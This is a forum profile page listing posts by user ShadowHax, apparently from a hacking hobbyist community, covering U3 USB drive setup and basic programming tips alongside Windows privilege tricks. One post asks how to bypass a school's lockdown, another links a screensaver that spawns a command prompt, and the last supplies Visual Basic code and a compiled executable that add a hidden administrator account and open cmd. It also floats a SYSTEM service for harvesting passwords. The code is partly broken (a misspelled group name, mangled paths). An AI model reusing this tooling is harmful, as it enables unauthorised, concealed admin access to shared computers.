Jump to content

ShadowHax

Active Members
  • Posts

    15
  • Joined

  • Last visited

Profile Information

  • Location
    Centreville, VA

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

ShadowHax's Achievements

Newbie

Newbie (1/14)

  1. You might want to look at this nice site I found: http://www.securiteam.com/windowsntfocus/5DP0X0055G.html Have fun
  2. The only problem with this is that some "locations" (erm my school) have blocked not only replacing utilman / cmd / service / all other windows apps from being replaced, and they locked off the display settings. The one thing they did forget is Compmgmt.msc though =) Any suggestions on how i could bypass this? without booting a live distro or floppy? thx
  3. For just basic programming I use Visual Basic. Its really easy to learn, and fast to use, but I wouldn't use it if your great at C, ASM (is it possible to be "great" as ASM?), or C++, as those languages are faster, and closer to the OS and System
  4. Ok... heres the cheat sheet On your cd partition: *** All of these are already on the CD partition, or should be *** autorun.inf Launchpad.zip LaunchU3.exe *** All of these are already on the FLASH partition, or should be *** /Documents /System LaunchU3.exe **** /What ever else you want goes on the flash partition UNLESS you used the ISO**** Hope this helps --ShadowHax
  5. I wouldn't try it on Windows :shock:
  6. Where is that autorun file located? If it's on your flash partition that's fine, but you can't change the cd one. Other than that it should work fine glad to help
  7. In case your still confused with hex/octal heres a great resource, not only for numbers but for all of C++ --- The Code Project -- (This is more .NET) http://www.codeproject.com/ http://www.codeproject.com/cpp/ -- C++ Tutorials/Guides --- http://www.cplusplus.com/ http://www.cplusplus.com/doc/hex.html
  8. "My crime is that of curiosity" heres a great wikipedia: http://en.wikipedia.org/wiki/Internet_protocol_suite
  9. Actually you can start typing and save it as an exe. I showed an example in #hak5 a few weeks ago. how i havent used windows in a couple a years, but i thought .exe were binary files. are you writing the actual hex or binary of the process you wish to to execute, if so thats awesome. or can exe's also be script code for a shell to interpret, I'm honestly not sure, an example of this here would be sweet though I was directly writing the ascii characters to a file. holy crap dude... that would take either serious time or serious skill =) If you are just starting I would suggest Visual Basic, as it it extremely easy to use and learn, but can still make great apps http://msdn.microsoft.com/vstudio/express/vb/
  10. The programs/logs/files/you get the point will go on the FLASH partition of the drive. The only thing on the CD partition is the autorun.inf and other files U3 needs to run
  11. Brilliant... And to think that I've been using the proto-type package maker. Great job, keep up the good work
  12. On some of the older USB's there is a switch on the outside of the case, I don't know about any of the newer ones, cus i haven't had this problem. Try reinstalling the ISO?
  13. I have compiled a screen saver that will open a command prompt when executed You may have to open taskmgr to kill the scrn saver, cus I made it transparent Here is the link to the compiled screen saver http://rrko.com/dev/scrncmd.zip http://rrko.com/dev/AddUser.zip --ShadowHax
  14. Heres a patch code that will add a new username + password, but will ask you for the creds, then it will delete the new admin from the user list, so that it is not visible from the fast-switch menu... Then it will open cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe Module HakXP Sub Main() Console.Write("Enter new username: ") Dim uName As String = Console.ReadLine() Console.Write("Enter password for " + uName + " : ") Dim pWord As String = Console.ReadLine() AddUser(uName, pWord) RunProcess("C:WINDOWSsystem32", "cmd.exe") 'Will open up a cmd prompt at C:WINDOWSsystem32 End Sub Sub AddUser(ByVal UserName As String, ByVal Password As String) Shell("net user " + UserName + " " + Password + " /add") 'Adds the user "UserName" with password "Password" Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group Shell("net localgroup users " + UserName + " /delete") 'If Fast-Switching is on, then "UserName" will show up End Sub Sub RunProcess(ByVal Path As String, ByVal Exe As String) Dim px As New Process px.StartInfo.WorkingDirectory = Path px.StartInfo.FileName = Exe px.Start() End Sub End Module Another possible approach... If you were to make a new windows process and create it under the SYSTEM account and set it to automatic, it would automaticly start at load, no matter who was logged in. This good be a possible way to retreive passwords? I'm working on it, have all the code, just need some filler code for the hack --ShadowHax
×
×
  • Create New...